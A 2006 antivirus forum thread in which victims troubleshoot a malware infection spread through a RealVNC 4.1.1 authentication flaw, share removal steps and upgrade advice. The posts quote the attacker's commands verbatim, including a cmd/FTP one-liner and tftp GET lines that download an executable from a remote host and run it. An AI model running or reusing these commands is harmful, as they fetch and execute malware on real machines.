Avast WEBforum
Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: aplcom on September 20, 2006, 09:11:16 AM
-
Hi,
Not sure if anyone has encountered this virus and whether there is a fix. This virus has attacked my wife's W2K Pro notebook (all securities etc up-to-date) running zonealarm (home free - all updates up to date) and avast (home/free edition - all updates up-to-date).
Periodiatically, the WINx (cmd) gets executed - the (cmd) black box comes up and the command [ tftp -i xxx.xxx.xxx.xxxx msqrsm.exe ] and a short while later it tries to run msqrsm. The ip address is different each time when this happens. I had already renamed the tftp command so it never gets executed and hence the pgm doesn't get downloaded.
How do I find which program or service is the culprit (may be a valid winx service that was compromised??) and stop this nonsense from continuing??
A bit of background - I had noticed that her computer was acting eratically so I rebooted with a clean WINX LIVE CD and did a complete clean with avast of her HDD and in fact found several pgms that had been hit by a virus - the identified pgms were deleted - i then proceeded to clean the registry of the bad items - and did a manual cleanup of some dirs found in "program files" - the culprit seems to have been gray_pigeon_hacker.com.
Also, if possible, can anyone shed light on how this virus was able to infect even through zonealarm and avast (BTW: she also runs spywareblaster and spybot search& destroy)?? (So I can prevent this from happening again!!)
Thanks for any help in this regard.
Rgds. Otto.
-
I can confirm this experience my daughter's desktop pc, Windows 2000, suddenly did the same and she managed to take some notes which I am deciphering. I have only just found this forum item with msqrsm:exe, I have deliberately inserted the colon.
However in our case an attempt was also made to download the program msinexecs:exe. of which I have been unable to find much information. Some hints found on a Norwegian site.
PC run Sygate personal Firewall, AVG free, Adaware, Spybot search and Destroy so far we don't think we have found anything about where it originates.
Date noticed 19th or 20th September, in Belgium
I ask the same question, how can it get 'out' with the firewall running and giving no notice.
C
-
Hi aplcom and cylosine. Welcome to the forums.
@aplcom
There is information about msqrsm.exe here
http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362
@cylosine
I think msinexecs.exe might be related to this
http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633
You could both try the trial version of Prevx that you can download from
http://www.prevx.com/
The two options on the web page, "Clean and Protect My PC Now" and "Protect My PC Now" download the same file afaik.
A word of caution - Prevx is a powerful program and, because of this, it uses a lot of resources when running. In addition to removing some malware it's also an IPS (intrusion prevention software) so it will sometimes block programs you want to run, or stop and ask if you want to allow a program to run. This can be annoying. But its software database, which is built on user input, is quite extensive so it will recognize most programs it encounters.
EDIT: BTW, aplcom, did avast! find and clean RBOT on your wife's computer?
-
Hi Mauserme,
Thanks for the info. I will try the prevx stuff and see if that clears it up - else I may have no choice but to re-install (my last option!!).
I searched and looked for RBOT but saw no signs of it - unless you are referring to something else. When I ran from a clean 'LIVE WIN CD' it did clean up several programs that were attacked - I will upload the list once I get my hands on her computer (currently I'm on contract in Singapore and she is in HK !!) within the next few days.
I am still very curious how all this came about - running ZONEALARM & AVAST - how did her computer get infected. Was it via an email? or by visiting a website? or did someone simply target an attack on her IP and somehow compromised insecure aspects of WIN2000PRO??
Again thanks for the replies and helping cure this ill.
Rgds. Otto.
-
Hi,
I managed to access my wifes computer via VNC, and guess what? - prevx found 3 files that were virused - in system32 it found (shell32.exe, kernel32.exe and dc1.exe) - it cleaned them up. I then found these same entries in the registry (run as services and also in explorer bars) and proceeded to delete them. Seems that all is back to normal.
Surprised that AVAST did not catch these files - even after I scanned tham manually!!
Again thanks to mauserme.
Rgds. otto.
-
I am still very curious how all this came about - running ZONEALARM & AVAST - how did her computer get infected. Was it via an email? or by visiting a website? or did someone simply target an attack on her IP and somehow compromised insecure aspects of WIN2000PRO??
Surprised that AVAST did not catch these files - even after I scanned tham manually!!
You're welcome Otto. I'm glad it worked out this easily.
I don't know if you noticed on the Prevx page, this was first seen in their community on September 17. Avast! probably does not have a signature yet (if you have it in the Prevx quarantine and you're adventuresome you could send a sample).
As far as how it got past ZA, my guess is that its disguising itself as an allowed program or possibly, if it uses a name like IEXPLORE.EXE, your wife might have allowed the connection when ZA asked.
Keith
-
Hi Mauserme,
This link helped me get some more information , I am struggling to find much:
http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362
This link does not convince me it has to do with msinexecs.exe:
http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633
The info from aplcom is very interesting, looking at the files shows you don't want to have them on your computer. The 3 files named are well known as bad ones, surprising that scanning with AVAST has not brought them to light. I do however know nothing much about AVAST. If these files are involved in our case it means that AVG can not find them either.
I have however not been able to convince myself that any of the files names I have seen are the original cause to the present problem, I see them as a result of another program has been started.
Which one or ones are still completely unclear, will wait patiently to see what emerges from the Internet.
C.
-
Hi cylosine,
The connection between msinexecs.exe and the Prevx link I posted in my response to you was actually drawn by Prevx rather than me
http://fileinfo.prevx.com/fileinfoweek.asp?mk=24/07/2006
(http://img125.imageshack.us/img125/7158/prevxpagehz1.png) (http://imageshack.us)
Waiting for additional information to become available may be a good approach because, as you say, there is very little on the web at the moment. You could also post a HijackThis log and we could ask Eddy to take a look.
-
Hi mauserme,
I went back to prevx once more and had much more luck.
http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html
Others interested, go same place and use the search facility to find more msinexecs.exe files, there is a heap of variations. Bad news is that it is a heavy duty version that is about at the moment.
Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.
HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.
The computer is in another continent so I have limited access, it is going to be a drawn out affair. I will report back as it goes on.
-
Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.
I didn't notice you mentioned what firewall you use ?
Hardware firewalls don't usually provide outbound protection nor does windows XP's firewall.
Any malware that manages to get past your defences will have free reign to connect to the internet to either download more of the same, pass your personal data (sensitive or otherwise, user names, passwords, keylogger retrieved data, etc.) or open a backdoor to your computer, so outbound protection is essential.
HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.
Might be time for a look at Hidden things http://invisiblethings.org
-
Maybe its just me but I still think its worth giving Prevx a try. From the url you posted, cylosine
"New Users: You can download the full Prevx1 product and use it to cleanup and remove MSINEXECS.EXE and other infections free of charge ..."
-
Maybe its just me but I still think its worth giving Prevx a try.
I liked this program when it was a freeware.
I hate freewares becoming shareware.
I don't trust (or like) companies that use this marketing policy.
Maybe it's just me 8)
-
I don't trust (or like) companies that use this marketing policy.
Maybe it's just me 8)
Waving with my hand...no Tech, it's not just you :) I also don't like it
-
@DavidR,
I did mention the firewall right at the beginning, Sygate Personal Firewall (the free version) has been very handy. Your comments are correct and a bit disheartening. SPF certainly picks up two way traffic.
@mauserme,
I am contemplating Prevx and I did notice the offer. Just reluctant to use yet another.
-
Hi Mauserme (Keith),
Seems that I was barking up the wrong tree all along. The PREVX1 idea was good and it did help. However after my (premature) posting that all was well, the darn dos box popped up again and the tftp - i command started mysteriously executing again.
I finally got fed up and used ethereal to monitor the network and FINALLY found the culprit. Remember I said I fixed my wife's computer via VNC - well guess what?? RealVNC (v4.1.1) had a security flaw in it and it was able to be compromised. Once I upgraded to v4.1.2 (flaw corrected) the problem has disappeared for good!!! Check out this site for more info.
http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html
Again, much thanks Keith for your help and time.
Rgds. Otto.
-
Hi aplcom,
Congratulations!! 8) The last thing I would have focused on.
Great piece of work, my daughter at the time with 95% probability was running the vnc4.1.1 server to allow me to log in. Great mistake starting it up with the computer, as we rarely use it but I thought it was safe so when I saw it running a few weeks ago when in Europe I did not think much about it. I had been wondering about if you would come back and tell that you still had the problem, I did not feel confident this was the cause you were finding, but I did not know enough to question your finding.
Naturally vnc is set to go through the firewall. I feel much better apart from the stupid thing of letting vnc run needlessly but of course the idea was I can connect whenever she is on line.
Did you work out from the packet sniffing where the origin IP was of the controller? By the way I am no expert on packet sniffing only have the program and used it trying to figure out why my IP phone would not connect to another IP address on the same ISP network. (IP direct to IP no middleman)
Many thanks for coming to the forum sharing your information. I feel much relieved on this occasion. Will update and rename tftp as well.
C.
-
Very nice indeed, Otto. Thanks for the update.
-
Hi Cylosine,
I used ethereal to monitor the traffic once the run command was executed - then analysed the packet data offline. I was able to see that it was port 5900 (VNC) that was being compromised (thankfully not if full screen mode - rather strictly in command mode!!!) hence the culprit was trying to further compromise the system by downloading the worm programs and backdoors. This is a relatively new exploit so thankfully no damage was done.
I did do a trace back and found the offending IP - reported it plus the logs to the ISP - but I doubt that anything will come of it. Its a hackers world!!!! (At least on Win-x machines - I have no probs whatsoever on my linux boxes!!!!!)
It is a good idea to rename or move programs like ftp, tftp, cmd.exe (or simply lock them altogether). Also a good idea to do a thorough check with AVAST as well as PREVX1 (Thanks to Keith!!). You can also checkout nmap as well as grc.com to check what can get through your computer ip & ports.
Good luck and hope this also solves your problem.
Rgds. Otto.
-
I hate freewares becoming shareware.
I hate that too. But it's still a good program, imo, even if the markteting strategy stinks :)
-
I hate that too. But it's still a good program, imo, even if the markteting strategy stinks :)
Other programs could do the same or better being freeware (or, at least, having a Lite or free version).
For instance: System Safety Monitor (http://syssafety.com/) :)
-
Hello,
we have the same malware here it seems.
It is seen the same way by PrevX1, and activate regularly some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launch them, and a lot of bad thinks !
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
It is MSQRSM, non detected by Avast , neith erother anti-virus (NAV, Grisoft) ou anti spyware (Ad aware).
but detected by PREVX1
I'd like to send you the .exe file .exe (237kb) for analyse and integration in Avast database, but it is in c:\system volume information\-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and non accessible.
I deactivated Windows restauration on all hard drive and rebooted, but still no access to this directory, neither directly, or for anti-virus soft !
I am working remotely on my father's PC, and cant boot on a DOS disck !
Any idea please to copy this file and send to you ?
It came by clicking a url in an HTML spam email ... but I erased the email (just too soon...)
OS = OS Windows XP SP2 home à jour des updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+ 512 MB ram
messagerie Thunderbird
NAV + Avast
le logiciel lance des fenetres CMD avec des scripts de téléchargement TFTP xx, il empèche la connexion de mozilla et thunderdbird au web et comptes smtp / pop, il crée différents exe dans windows/system32, qui sont executés (vus dans le getionnaire des taches) etc. ASSEZ NOCIF...
Thanks
FX
-
Hello FX,
You mention that you are working remotely on your dad's machine? Are you using RealVNC 4.1.1? If so - it has a security hole that can be breached in the auth module. Check out this site for more info:
http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html
Rgds. Otto.
-
Hi aplcom,
Thank you for ethereal information I understand, you are right about action is unlikely from ISP. Since this is now running in Europe too I assume Scotland Yard allready know about it.
From what we experience at least on some occasions [yes still running but that was an oversight on our behalf ] seems to be a download to another IP address than the host machine. The trouble you saw was the attempt to download to your IP address?
I just see your question to FXsan78 come in, was going to inquire about the version too. I guess he is in trouble as the dirt software already running.
@FXsan78
what keyboard layout is installed on your attacked machine? I noticed the French at the bottom and I am very interested in type of keyboard you use on the target machine.
C.
-
Hi aplcom,
I forgot to add that for many weeks our computer has been running 'stealth' mode according to grc.com. That was why I could not figure out how something had gotten through apparently without any action on the part of the operator. It is however likely to be wishfull thinking that my daughter did not get it by email.
With vnc running all the time well bad luck for us.
C.
-
I deactivated Windows restauration on all hard drive and rebooted, but still no access to this directory, neither directly, or for anti-virus soft !
Any idea please to copy this file and send to you ?
Hi FX,
When you turned off System Restore you effectively deleted the file from that location. If its still on your hard drive somewhere else you can email a zipped and password protected sample to virus@avast.com. Make sure to explain that it is an undetected virus and provide the password in the body of your email.
If you're using RealVNC make sure you follow aplcom's link to patch this security hole.
@aplcom and cylosine,
If FX's infection is the same as yours then you may find the problem recurs even after applying the RealVNC patch. If it does then do as FX did: turn off System Restore, reboot, and scan again.
-
We have installed RealVNC 4.1.2 and are trying to log the attacks. They seem to still occur but now Sygate Personal Firewall is warning of attempts to connect VNC session. We have decided to keep VNC server running for a while.
From the data we believe that the attack is coming from a computer in the same big network which our computer is connected to. I am guessing this is a random number and that it is automated. Hope to catch a few more before the attacks stop. The originator can't be that silly to keep it up for a long time allowing tracing.
I noticed that the free version of VNC is a bit limited in the use of encryption for this reason I am reconsidering its use over the internet, it is a bit of a jungle to get through safely.
C.
-
Hi,
I've not had any re-occurance at all. Once I realized what the problem was, I booted from a clean "Win Live CD" and cleaned the hdd (deleted all tmp areas, deleted recycled etc etc etc) - ran several diff antivirus scanners and also manually cleaned the registry. I also put cmd.exe, tftp.exe, ftp.exe and several other pgms into a secure area only accessable by me (also renamed those pgms) just to be safe. I also re-installed the firewall from scratch and set new rules (Using Zonealarm - ONLY vnc has server rights - all else locked out).
I agree - the attack seems to occur on the same ISP network (mine is 221.124.x.y) - leads me to believe that someones computer on the network is compromised and the hacker is using that system to hack others on the same network. As the attack is identical every time - I also cant believe the hacker to be so stupid (hence it may be a bot??)
You can also consider ultraVNC or tightVNC - both are free - both offer super encryption - both dont have the auth security hole - however - realVNC 4.1.2 seems to have solved most of my problems.
Keeping my fingers crossed - but alls well so far!!
Rgds.
-
Hello,
@ aplcom/Otto, yes I was using RealVNC 4.1.1.
I upgraded to 4.2 (30days version) after reading the post here.
Now I have found back a version 4.1.2 which is full without 30 days licence. I will install it back after solving everything
@cylosine, yes AZERTY french keyboard
@mauserme, as I said I deleted the email I suspected to have the link importing the virus, and sorry I could not send it to you
Tonight NAV reports a Magister virus. I will try remove tool, but will need some local aid for booting in safe mode ;-)
Thanks to all
fX
-
Hi FXsan78,
VNC 4.2 is the "VNC Personal" version which costs money, I also got a bit confused and downloaded this but went searching a bit more for the so called "VNC Free" until I found it.
I am making a strong guess that the machine that attacked you also had a French AZERTY keyboard, this however unlikely to be of any help.
Depending on how familiar you are with computers I can recommend always having a Bart PE boot disk, this is a short version of Windows which will boot and run windows off a CD and you can access your hard disk from this environment.
This is similar to what aplcom is saying about using a "Win Live CD".
C.
-
Hi all, this is my first post,
My company have 4 servers running 3 is windows 2000 and 1 is windows 2003, 4 day ago, when I using VNC remote to my company servers from my home, I saw all servers auto open cmd command in run, and in command auto type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe, checked the firwall log always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x mean radom), SRC port is 22xx (xx mean radom), DEST port 5900, and 1 mins can sent many packet to random private IP....
Any brother can tell me what type of Vrius Infected? and how to fix this problem ?
or just need upgrade the VNC version to 4.1.2 to solve all problem ?
Home VNC version 4.1.2, company server VNC version 4.1.1
Thanks !!!
Wilson
-
Hi leiw,
May you find inspiration and help in the forum.
1.. Version 4.1.1 you can not get rid of fast enough, especially now you have seen that somebody knows perhaps accidentally that your servers exists.
Upgrading to 4.1.2 get you over the initial flaw ban if you are using the free version I would suggest you do review this for use over the internet. Reading the small print/manual or specs closer this is not recommended when you cross the internet jungle as the password encryption is not strong. The normal session information I understand is just open to anybody with no encryption.
I forgot this and happyly used it for 12 months until it went bad. If your company information is.important you should consider the 'bigger' versions which have much better encryption and encryption on the session transmissions. Convince yourself you understand all this because I am not an expert just have some reasonable understanding about various aspects of computing.
Consider moving away from using the default port of 5900, perhaps that may give you some protection. "everybody" knows that port and will almost by default have this in their software. Just makes it a little bit harder for unwanted sniffing.
I am deliberately using the underscore in the next lines
tftp -i 0.0.0.0 GET msqrsm_exe
msqrsm_exe
My understanding is the first line downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.
The second line executes the msqrsm_exe, if it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.
The only place I have seen help is PREVX1, I am still trying to find out more. Actually I have put our machine on sort of hold as I have run out of energy to focus on just this bastard.
Like you I have still no idea how our machine got activated. Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall. Unforunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.
Do you have a software firewall as well as NAT, I may be a little bit out on deep water as you talked about servers and I talk about hosts. You may be better protected.
Have you facility to log all incoming and outgoing traffic? If so this should reveal a lot about what msqrsm_exe.
Where it came from? No idea
Good luck and I hope it did not run.
C.
-
To Cylosine:
Thank for your reply, I will go back to compay to upgrade the VNC to 4.1.2 version, one question is after upgraded the VNC, the auto command will be disappear ? or need use PREVX1 to clear all dirty file? but I think maybe cannot clear all dirty file, because I was tried it.
I using Shorewall that is Linux free firewall inculded NAT, packet filtering etc, now I droped all outgoing traffic for perevent, Iwill post the firewall log when I go back to company.
-
Hi leiw
1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But I am not looking at the moment.
C.
-
My understanding is the first line downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.
I believe 0.0.0.0 designates "default route" in this case. This way an outbound connection can be established without knowing the address for the gateway and may hide the underlying process to some degree.
Like you I have still no idea how our machine got activated. Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall.
Certainly port 5900 is open during an active session but keep in mind that the GRC site doesn't scan that high (it only goes as high as port 1055 for the Scan All Service Ports test and includes port 5000 (but nothing higher) for the Common Ports test). If you want to test this further you could try the scanning tools at PC Flank which has an option to specify a port under the Advanced Port Scanner tab
http://www.pcflank.com/scanner1s.htm
or a program like Nmap (use cautiously lest you get booted by your ISP).
From this point of view it could be a random scan but maybe more likely an attacker targeting the vulnerability.
1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But
I'm guessing #1 will be the case if your server is being cracked during an active session, but you might still need to remove malware (so far I haven't seen any indication that its originating on the client).
#2 is a definite if the problem originates on the server in the form of something like a trojan downloader.
The answer to which of these is the case may be in when the problems occur - only during an active session or randomly when the server is idling. Does anyone have information on this?
-
Hi mauserme,
About 0.0.0.0 I was hoping this was not the case, wonder what happened.
GRC test, thanks for pointing out the scan is limited to 'service' group. I forgot that higher up one must be more specific, the largest range scan is 64 ports at a time. A scan of 5900-5963 only revealed that 5900 is known as vnc entry.
General: I have just done a search on the internet for following files, and listed what viruslabs seem to have some info:
msinexecs.exe prevx
msqrsm.exe prevx
winlolx.exe prevx, sophus?
louvz.exe nothing mentioned
Has anybody else seen better information on these?